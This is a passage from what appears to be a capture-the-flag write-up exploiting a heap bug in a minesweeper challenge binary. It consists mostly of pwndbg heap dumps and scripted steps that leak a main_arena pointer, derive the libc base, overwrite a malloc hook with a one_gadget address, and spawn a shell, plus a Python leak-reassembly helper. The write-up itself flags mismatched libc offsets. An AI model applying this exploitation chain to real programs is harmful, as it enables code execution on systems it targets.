000000b0  20 2a 20 20  2a 20 20 2a  20 20 2a 20  20 0a 2a 20  │ *  │*  *│  * │ ·* │

000000c0  20 2a 20 20  2a 20 20 2a  20 20 2a 20  20 2a 20 20  │ *  │*  *│  * │ *  │

000000d0  2a 20 20 2a  20 20 0a 2a  20 20 2a 20  20 2a 20 20  │*  *│  ·*│  * │ *  │

000000e0  2a 20 20 2a  20 20 2a 20  20 2a 20 20  2a 20 20 0a  │*  *│  * │ *  │*  ·│

000000f0  2a 20 20 2a  20 20 2a 20  20 2a 20 20  2a 20 20 2a  │*  *│  * │ *  │*  *│

00000100  20 20 2a 20  20 2a 20 20  0a 2a 20 20  2a 20 20 2a  │  * │ *  │·*  │*  *│

00000110  20 20 2a 20  20 2a 20 20  2a 20 20 2a  20 20 2a 20  │  * │ *  │*  *│  * │

00000120  20 0a 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  │ ·--│----│----│----│

00000130  2d 2d 2d 2d  2d 2d 2d 2d  0a                        │----│----│·│

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x00007f0f33623ba8       0x00007f0f33623ba8

0x56034da40020:    0x3131313131313131     0x3131313131313131

0x56034da40030:    0x3131313131313131     0x000056034da400e8

0x56034da40040:    0x0000000000000040     0x0000000000000030

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x00000000000000f1

0x56034da400a0:    0x00007f0f33623b78       0x00007f0f33623b78

0x56034da400b0:    0x6161616161616161     0x6161616161616161

0x56034da400c0:    0x6161616161616161     0x6161616161616161

0x56034da400d0:    0x6161616161616161     0x6161616161616161

0x56034da400e0:    0x6161616161616161     0x6161616161616161

0x56034da400f0:     0x6161616161616161     0x6161616161616161

0x56034da40100:    0x6161616161616161     0x6161616161616161

0x56034da40110:    0x6161616161616161     0x6161616161616161

0x56034da40120:    0x6161616161616161     0x6161616161616161

0x56034da40130:    0x6161616161616161     0x6161616161616161

0x56034da40140:    0x000056034da400a0     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x00000000000000f0      0x0000000000000020

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x56034da40090 —▸0x7f0f33623b78 (main_arena+88)◂—0x56034da40090

smallbins

0x40: 0x56034da40000 —▸ 0x7f0f33623ba8 (main_arena+136) ◂—0x56034da40000

largebins

empty

14. feed(0xe0,'a'*0xa0+'\xa1'+chr(ch-1))

Same again, but the two low bytes become 0xa1 and 0x00: row pointer 0 is now 0x000056034da400a1, chunk4's data plus one, so the next print yields the odd bytes of the fd.

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x00007f0f33623ba8       0x00007f0f33623ba8

0x56034da40020:    0x3131313131313131     0x3131313131313131

0x56034da40030:    0x3131313131313131     0x000056034da400e8

0x56034da40040:    0x0000000000000040     0x0000000000000030

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x00000000000000f1

0x56034da400a0:    0x00007f0f33623b78       0x00007f0f33623b78

0x56034da400b0:    0x6161616161616161     0x6161616161616161

0x56034da400c0:    0x6161616161616161     0x6161616161616161

0x56034da400d0:    0x6161616161616161     0x6161616161616161

0x56034da400e0:    0x6161616161616161     0x6161616161616161

0x56034da400f0:     0x6161616161616161     0x6161616161616161

0x56034da40100:    0x6161616161616161     0x6161616161616161

0x56034da40110:    0x6161616161616161     0x6161616161616161

0x56034da40120:    0x6161616161616161     0x6161616161616161

0x56034da40130:    0x6161616161616161     0x6161616161616161

0x56034da40140:    0x000056034da400a1     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x00000000000000f0      0x0000000000000020

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x56034da40090 —▸ 0x7f0f33623b78 (main_arena+88) ◂—0x56034da40090

smallbins

0x40: 0x56034da40000 —▸ 0x7f0f33623ba8 (main_arena+136) ◂—0x56034da40000

largebins

empty

15. start()

r2 = getres()

Row 0 now shows the odd bytes of the fd: ';' (0x3b), '3' (0x33), 0x7f, 0x00.

00000000  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  │----│----│----│----│

00000010  2d 2d 2d 2d  2d 2d 0a 57  65 6c 63 6f  6d 65 20 74  │----│--·W│elco│me t│

00000020  6f 20 6d 69  6e 65 73 77  65 65 70 65  72 0a 20 20  │o mi│nesw│eepe│r·  │

00000030  20 50 61 6e  65 6c 3a 38  2a 38 20 4d  69 6e 65 3a  │ Pan│el:8│*8 M│ine:│

00000040  33 30 0a 2d  2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d  │30·-│----│----│----│

00000050  2d 2d 2d 2d  2d 2d 2d 2d  2d 0a 3b 20  20 33 20 20  │----│----│-·; │ 3  │

00000060  7f 20 20 00  20 20 3b 20  20 33 20 20  7f 20 20 00  │·  ·│  ; │ 3  │·  ·│

00000070  20 20 0a 2a  20 20 2a 20  20 2a 20 20  2a 20 20 2a  │  ·*│  * │ *  │*  *│

00000080  20 20 2a 20  20 2a 20 20  2a 20 20 0a  2a 20 20 2a  │  * │ *  │*  ·│*  *│

00000090  20 20 2a 20  20 2a 20 20  2a 20 20 2a  20 20 2a 20  │  * │ *  │*  *│  * │

000000a0  20 2a 20 20  0a 2a 20 20  2a 20 20 2a  20 20 2a 20  │ *  │·*  │*  *│  * │

000000b0  20 2a 20 20  2a 20 20 2a  20 20 2a 20  20 0a 2a 20  │ *  │*  *│  * │ ·* │

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x00007f0f33623ba8       0x00007f0f33623ba8

0x56034da40020:    0x3131313131313131     0x3131313131313131

0x56034da40030:    0x3131313131313131     0x000056034da400e8

0x56034da40040:    0x0000000000000040     0x0000000000000030

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x00000000000000f1

0x56034da400a0:    0x00007f0f33623b78       0x00007f0f33623b78

0x56034da400b0:    0x6161616161616161     0x6161616161616161

0x56034da400c0:    0x6161616161616161     0x6161616161616161

0x56034da400d0:    0x6161616161616161     0x6161616161616161

0x56034da400e0:    0x6161616161616161     0x6161616161616161

0x56034da400f0:     0x6161616161616161     0x6161616161616161

0x56034da40100:    0x6161616161616161     0x6161616161616161

0x56034da40110:    0x6161616161616161     0x6161616161616161

0x56034da40120:    0x6161616161616161     0x6161616161616161

0x56034da40130:    0x6161616161616161     0x6161616161616161

0x56034da40140:    0x000056034da400a1     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x00000000000000f0      0x0000000000000020

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

Combining r1 and r2, the bytes printed through the two offset pointers reassemble to addr = 0x7f0f33623b78 (each printed byte is followed by two spaces, hence indices 0, 3 and 6; the top two bytes of a userland pointer are zero):

addr = u64(r1[0]+r2[0]+r1[3]+r2[3]+r1[6]+r2[6]+'\x00\x00')

main_arena+88 = 0x7f0f33623b78; with main_arena_offset = 0x3C1760:

libc = addr - 0x3C17B8 = 0x7F0F332623C0

hook_addr = libc + 0x3C1740 = 0x7F0F33623B00

one_addr = libc + 0xe9f2d = 0x7F0F3334C2ED

A check worth doing at this point: 0x7f0f332623c0 is not page-aligned, and a libc base always is. So 0x3c1760 is not main_arena's offset in the libc loaded in this debugging session; the three offsets belong to the challenge's libc. The local numbers are consistent with Ubuntu 16.04's glibc 2.23 (main_arena at 0x3c4b20, which gives the page-aligned base 0x7f0f3325f000), and there __malloc_hook is main_arena-0x10 = 0x7f0f33623b10, while hook_addr = addr-0x78 = main_arena-0x20 is __memalign_hook, exactly the symbol pwndbg shows for it in step 20. When reproducing locally, take main_arena, __malloc_hook and the one_gadget offset from the libc actually loaded (libc.symbols['__malloc_hook'], one_gadget run on that file) and assert libc & 0xfff == 0 before going on.

log.info(hex(libc))

io.sendline('back,')
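The leak assembly and base computation above, as an added example (not the writeup's script, and it does not need pwntools): the two board prints are rebuilt inline from the hexdumps as constructed sample input, row 0 of each is split into cells, the even and odd bytes are zipped back into the 64-bit fd, and the base is derived and checked for page alignment before any hook address is computed. The glibc 2.23 offsets used in the test (main_arena 0x3c4b20, __malloc_hook 0x3c4b10) are the Ubuntu 16.04 values and are an assumption about the local libc, not something the writeup states.

```python
import struct

# Constructed stand-ins for the two start() outputs captured in the writeup.
# Row 0 is printed from the misdirected row pointer: one display byte per cell
# followed by two spaces. With the pointer at chunk4+0 the cells show the even
# bytes of the unsorted-bin fd, with the pointer at chunk4+1 the odd bytes.
BANNER = b"-" * 22 + b"\nWelcome to minesweeper\n   Panel:8*8 Mine:30\n" + b"-" * 22 + b"\n"
HIDDEN_ROW = b"*  " * 8 + b"\n"


def fake_board(row0):
    """Assemble a full board print: banner, row 0, seven untouched rows, footer."""
    return BANNER + row0 + HIDDEN_ROW * 7 + b"-" * 22 + b"\n"


R1 = fake_board(b"x  b  \x0f  \x00  x  b  \x0f  \x00  \n")   # row pointer = chunk4 data
R2 = fake_board(b";  3  \x7f  \x00  ;  3  \x7f  \x00  \n")   # row pointer = chunk4 data + 1

CELL_STRIDE = 3               # display byte + two spaces
UNSORTED_FD_TO_ARENA = 0x58   # fd of a lone unsorted chunk = &main_arena.top = main_arena+88


def row0_display_bytes(board, ncells=4):
    """Display bytes of the first ncells cells of row 0, the line after the second separator."""
    row = board.split(b"\n")[4]
    return bytes(row[i * CELL_STRIDE] for i in range(ncells))


def recover_qword(board_even, board_odd):
    """Zip the even-address bytes (first print) with the odd-address bytes
    (second print) back into a little-endian u64; four cells per print cover 8 bytes."""
    even = row0_display_bytes(board_even)
    odd = row0_display_bytes(board_odd)
    return struct.unpack("<Q", b"".join(bytes([e, o]) for e, o in zip(even, odd)))[0]


def libc_base(leaked_fd, main_arena_off):
    """libc load address from a leaked main_arena+88 pointer and the offset of
    main_arena in the libc build the offsets were taken from."""
    return leaked_fd - UNSORTED_FD_TO_ARENA - main_arena_off


def base_is_plausible(base):
    """libc is mmapped page-aligned; low 12 bits set means the symbol offsets
    do not belong to the libc that is actually loaded."""
    return base & 0xfff == 0


def resolve(leaked_fd, main_arena_off, malloc_hook_off, one_gadget_off):
    """Do the writeup's arithmetic, refusing to continue on an implausible base."""
    base = libc_base(leaked_fd, main_arena_off)
    if not base_is_plausible(base):
        raise ValueError("libc base 0x%x is not page-aligned: wrong libc offsets" % base)
    return base, base + malloc_hook_off, base + one_gadget_off
```

With the writeup's offsets resolve() refuses the leak (base 0x7f0f332623c0); with the offsets of the libc actually loaded it yields a page-aligned base and __malloc_hook at main_arena-0x10.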

17. feed(0x30,'a'*0x28+p64(hook_addr)[:-1])

malloc(0x30) returns chunk1 (data at 0x56034da40010), this time from smallbin 0x40. The 0x28 bytes of 'a' reach the name pointer and p64(hook_addr)[:-1] writes its low 7 bytes; the top byte of a userland address is 0 and the byte already there is 0, so it is left alone. The chunk is then freed into fastbin 0x40.

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x0000000000000000     0x6161616161616161

0x56034da40020:    0x6161616161616161     0x6161616161616161

0x56034da40030:    0x6161616161616161     0x00007f0f33623b00

0x56034da40040:    0x0000000000000040     0x0000000000000031

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x00000000000000f1

0x56034da400a0:    0x00007f0f33623b78       0x00007f0f33623b78

0x56034da400b0:    0x6161616161616161     0x6161616161616161

0x56034da400c0:    0x6161616161616161     0x6161616161616161

0x56034da400d0:    0x6161616161616161     0x6161616161616161

0x56034da400e0:    0x6161616161616161     0x6161616161616161

0x56034da400f0:     0x6161616161616161     0x6161616161616161

0x56034da40100:    0x6161616161616161     0x6161616161616161

0x56034da40110:    0x6161616161616161     0x6161616161616161

0x56034da40120:    0x6161616161616161     0x6161616161616161

0x56034da40130:    0x6161616161616161     0x6161616161616161

0x56034da40140:    0x000056034da400a1     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x00000000000000f0      0x0000000000000020

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x56034da40000 ◂— 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x56034da40090 —▸ 0x7f0f33623b78 (main_arena+88) ◂—0x56034da40090

smallbins

empty

largebins

empty

18. start()

No change; the board is still printed from the freed chunks.

19. explore(1,1,3)

The win-flag field of chunk1 holds 0x6161616161616161, which is non-zero, so the program prints "leave your name, my hero" and asks for the name.

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x0000000000000000     0x6161616161616161

0x56034da40020:    0x6161616161616161     0x6161616161616161

0x56034da40030:    0x6161616161616161     0x00007f0f33623b00

io.recvuntil('hero\n')   

20. io.sendline(p64(one_addr))

The name is written through the name pointer, i.e. at hook_addr 0x00007f0f33623b00, and it is the one_gadget address. pwndbg resolves that address to __memalign_hook in the local libc:

pwndbg> x/gx 0x00007f0f33623b00

0x7f0f33623b00 <__memalign_hook>:   0x00007f0f3334c2ed

io.sendline('back,')

22. feed(0x30,'0')

feed's malloc() runs __malloc_hook, which in the target now holds the one_gadget, and a shell is spawned. This only fires if hook_addr really is __malloc_hook of the libc that is loaded: the __memalign_hook symbol pwndbg printed in step 20 shows that the offsets used here belong to a different libc build than the one in this debugging session, so for a local reproduction the hook offset has to be taken from the local libc.

Article link: https://www.haomeiwen.com/subject/jendtctx.html